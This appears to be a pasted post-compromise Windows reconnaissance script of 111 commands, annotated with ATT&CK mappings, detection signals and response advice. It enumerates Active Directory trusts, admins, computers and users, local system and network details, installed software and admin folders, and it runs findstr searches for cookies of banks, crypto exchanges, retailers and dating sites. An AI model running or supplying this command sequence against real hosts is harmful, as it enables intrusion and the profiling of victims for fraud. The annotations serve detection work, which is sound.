
Recon Script

a guest Feb 28th, 2020 619 Never
  REM Domain and network discovery using built-in Windows tools only.
  REM Nothing is dropped to disk, so file-based detection will not see this stage;
  REM process-creation logging with command lines (Security event 4688 with
  REM command-line auditing, or Sysmon event 1) is the practical detection source.
  REM ATT&CK: T1482 Domain Trust Discovery, T1018 Remote System Discovery,
  REM T1069.002 Permission Groups Discovery: Domain Groups.
  REM nltest /domain_trusts lists the trust relationships of the joined domain.
  1. nltest /domain_trusts
  REM Prints computer name, logged-on user name and workstation domain.
  2. net config workstation
  REM net view enumerates hosts/shares visible to this machine; with /domain it
  REM lists domains instead. Output depends on browsing/SMB settings of the host.
  3. net view /all
  4. net view /all /domain
  REM Lists members of the Domain Admins group by querying a domain controller.
  REM The typographic quotes are as they appear in the paste; detections should
  REM key on the executable and arguments rather than on the quote characters.
  5. net group “domain admins” /domain
  REM Bulk Active Directory queries over LDAP (ATT&CK T1087.002 Account Discovery:
  REM Domain Account, T1018 Remote System Discovery). "-limit 0" removes the
  REM default result cap, so each query asks for every matching object.
  REM dsquery.exe ships with the AD DS tools/RSAT; its execution on an ordinary
  REM workstation or by a non-admin user is a useful hunting signal.
  REM Query 1: all computer objects with host name, DN, description and OS.
  6. dsquery * -filter “objectcategory=computer” -attr dNSHostName distinguishedName description operatingSystem -limit 0
  REM Query 2: all person objects with a sAMAccountName, returning account name,
  REM mail address and the free-text comment/description attributes.
  7. dsquery * -filter “&(objectcategory=person)(samaccountname=*)” -attr sAMAccountName mail comment description -limit 0
  REM Local host profiling (ATT&CK T1049 System Network Connections Discovery,
  REM T1087.001 Account Discovery: Local Account, T1082 System Information
  REM Discovery, T1016 System Network Configuration Discovery).
  REM Each command is common in admin work; the signal is the rapid sequence
  REM from one parent process, not any single line.
  REM Lists inbound SMB sessions to this machine.
  8. net session
  REM Lists local user accounts.
  9. net user
  REM systeminfo with every line containing "KB" filtered out (find /V keeps
  REM non-matching lines), i.e. OS/hardware details without the hotfix list.
  10. systeminfo | find /V “KB”
  REM Full adapter configuration: addresses, DNS servers, DHCP, MAC.
  11. ipconfig /all
  REM Listening TCP sockets only (case-insensitive match on "listening").
  12. netstat -an | find /i “listening”
  REM Same command as step 2, repeated.
  13. net config workstation
  REM Installed-software inventory read from the registry (ATT&CK T1518 Software
  REM Discovery, T1012 Query Registry). Only the 64-bit/native Uninstall key is
  REM read here; no WOW6432Node or per-user (HKCU) key appears in the paste.
  REM Step 14 lists the subkeys of the Uninstall key.
  14. reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall”
  REM Steps 15-28 read DisplayName from one subkey each. The subkey names and
  REM GUIDs are presumably the ones step 14 returned on the observed host --
  REM not verifiable from the paste. If so they are host-specific and make poor
  REM indicators; hunt on the pattern (many reg.exe "Uninstall\<key> /v
  REM DisplayName" launches in a short window) instead of these exact values.
  15. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime” /v DisplayName
  16. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore” /v DisplayName
  17. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40” /v DisplayName
  18. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data” /v DisplayName
  19. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX” /v DisplayName
  20. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData" /v DisplayName
  21. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack" /v DisplayName
  22. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2" /v DisplayName
  23. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent" /v DisplayName
  24. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC" /v DisplayName
  25. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0040E310-5FEB-4626-BA89-7678B473DEF8}" /v DisplayName
  26. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5525C0AB-E025-4951-9C84-DD490DD95B0F}" /v DisplayName
  27. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D339C288-2EEA-49A3-B10F-979FC2715A2C}" /v DisplayName
  28. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F383A96C-9EF4-4ED9-BE86-85A938DCE021}" /v DisplayName
  REM Running-process list (ATT&CK T1057 Process Discovery); typically shows
  REM which security and monitoring agents are present on the host.
  29. tasklist
  REM Only the IPv4 address lines of the adapter summary.
  30. ipconfig | find "IPv4"
  REM Steps 31-102: one findstr per service name. /m prints only the names of
  REM files that contain the string, and "*" means every file in the current
  REM directory. The working directory is not shown in the paste; several strings
  REM have a cookie name appended to the domain (e.g. "amazon.comsession"), which
  REM suggests a browser cookie store is being searched -- TODO confirm against
  REM the process's current directory in telemetry.
  REM Effect: a profile of which online services the user has visited, without
  REM reading any credential. ATT&CK T1083 File and Directory Discovery.
  REM Detection: a burst of dozens of findstr.exe launches with "/m <domain> *"
  REM from one parent within seconds is highly unusual for legitimate software.
  REM Response: if this sequence is found on a host, treat sessions and passwords
  REM for the matched services as exposed and rotate them.
  REM
  REM Payment processors, banks and cryptocurrency exchanges.
  31. findstr  /m cookie_check.paypal.com *
  32. findstr  /m paypal.comcookie_check *
  33. findstr  /m account.skrill.com *
  34. findstr  /m westernunion.com *
  35. findstr  /m neteller.com *
  36. findstr  /m entropay.com *
  37. findstr  /m 2checkout.com *
  38. findstr  /m wepay.com *
  39. findstr  /m .v.me *
  40. findstr  /m gopayment.com *
  41. findstr  /m dwolla.com *
  42. findstr  /m aib.ie *
  43. findstr  /m barclaycardus.com *
  44. findstr  /m capitalone.com *
  45. findstr  /m chase.com *
  46. findstr  /m coinbase.com *
  47. findstr  /m liqpay.com *
  48. findstr  /m moneybookers.com *
  49. findstr  /m open24.ie *
  50. findstr  /m payeer.com *
  51. findstr  /m paysurfer.com *
  52. findstr  /m perfectmoney.com *
  53. findstr  /m suntrust.com *
  54. findstr  /m wellsfargo.com *
  REM Retail, marketplace, travel and gaming storefronts.
  55. findstr  /m sears.com *
  56. findstr  /m overstock.com *
  57. findstr  /m ebay.comnonsession *
  58. findstr  /m dell.com *
  59. findstr  /m amazon.comsession *
  60. findstr  /m apple.comdssid *
  61. findstr  /m beacon.walmart.com *
  62. findstr  /m bestbuy.comcontext_id *
  63. findstr  /m newegg.coms_per *
  64. findstr  /m airbnb.com *
  65. findstr  /m bhphotovideo.com *
  66. findstr  /m farfetch.com *
  67. findstr  /m lowes.com *
  68. findstr  /m officedepot.com *
  69. findstr  /m qvc.com *
  70. findstr  /m steampowered.com *
  71. findstr  /m target.com *
  REM Dating sites.
  72. findstr  /m match.com *
  73. findstr  /m mysinglefriend.com *
  74. findstr  /m friendfinder.com *
  75. findstr  /m jdate.com *
  76. findstr  /m gay.com *
  77. findstr  /m christianconnection.com *
  78. findstr  /m muddymatches.co.uk *
  79. findstr  /m zoosk.com *
  80. findstr  /m shaadi.com *
  81. findstr  /m datingdirect.com *
  82. findstr  /m lovearts.com *
  83. findstr  /m amateurmatch.com *
  84. findstr  /m cupid.com *
  85. findstr  /m datehookup.com *
  86. findstr  /m meetic.com *
  87. findstr  /m meetme.com *
  REM Webmail / identity provider sign-in hosts.
  88. findstr  /m accounts.google.com *
  89. findstr  /m mail.live.com *
  90. findstr  /m login.yahoo.com *
  REM Telecom carriers.
  91. findstr  /m att.com *
  92. findstr  /m sprint.com *
  93. findstr  /m verizonwireless.com *
  94. findstr  /m vzw.com *
  95. findstr  /m verizon.com *
  REM Classifieds, job search, file sharing, shipping and an IP-check service.
  REM "craiglist.org" is spelled as in the paste.
  96. findstr  /m craiglist.org *
  97. findstr  /m indeed.com *
  98. findstr  /m sendspace.com *
  99. findstr  /m swiftunlocks.com *
  100. findstr  /m ups.com *
  101. findstr  /m whoer.net *
  102. findstr  /m fedex.com *
  REM Non-recursive directory listings of the system drive root, both Program
  REM Files trees and the profile folders of the account named "administrator"
  REM (ATT&CK T1083 File and Directory Discovery). -ErrorAction SilentlyContinue
  REM hides access-denied and path-not-found errors from the output.
  REM The backslash-escaped quotes suggest these lines were copied from a log or
  REM from a launcher that escapes its command line -- not verifiable from the
  REM paste. PowerShell script-block logging (event 4104) and process-creation
  REM events both record these invocations.
  103. powershell  Get-ChildItem -Path C:\ -ErrorAction SilentlyContinue
  104. powershell  Get-ChildItem -Path \"C:\Program Files\" -ErrorAction SilentlyContinue
  105. powershell  Get-ChildItem -Path \"C:\Program Files (x86) \" -ErrorAction SilentlyContinue
  106. powershell  Get-ChildItem -Path \"C:\Users\administrator\AppData\Roaming\" -ErrorAction SilentlyContinue
  107. powershell  Get-ChildItem -Path \"C:\Users\administrator\AppData\Local\" -ErrorAction SilentlyContinue
  108. powershell  Get-ChildItem -Path \"C:\Users\administrator\Desktop\" -ErrorAction SilentlyContinue
  109. powershell  Get-ChildItem -Path \"C:\Users\administrator\Downloads\" -ErrorAction SilentlyContinue
  110. powershell  Get-ChildItem -Path \"C:\Users\administrator\Documents\" -ErrorAction SilentlyContinue
  REM Prints the contents of win_install.log.txt from the current directory.
  REM The 'cmd.exe /S /D /c" ... "' form is what cmd.exe itself generates for a
  REM built-in command on one side of a pipeline, so this line looks like
  REM process-creation telemetry rather than something typed -- the other side
  REM of the pipe is not in the paste. The file name alone says nothing about
  REM the file's origin; confirm on the host before treating it as an indicator.
  111. C:\Windows\system32\cmd.exe  /S /D /c" TYPE win_install.log.txt "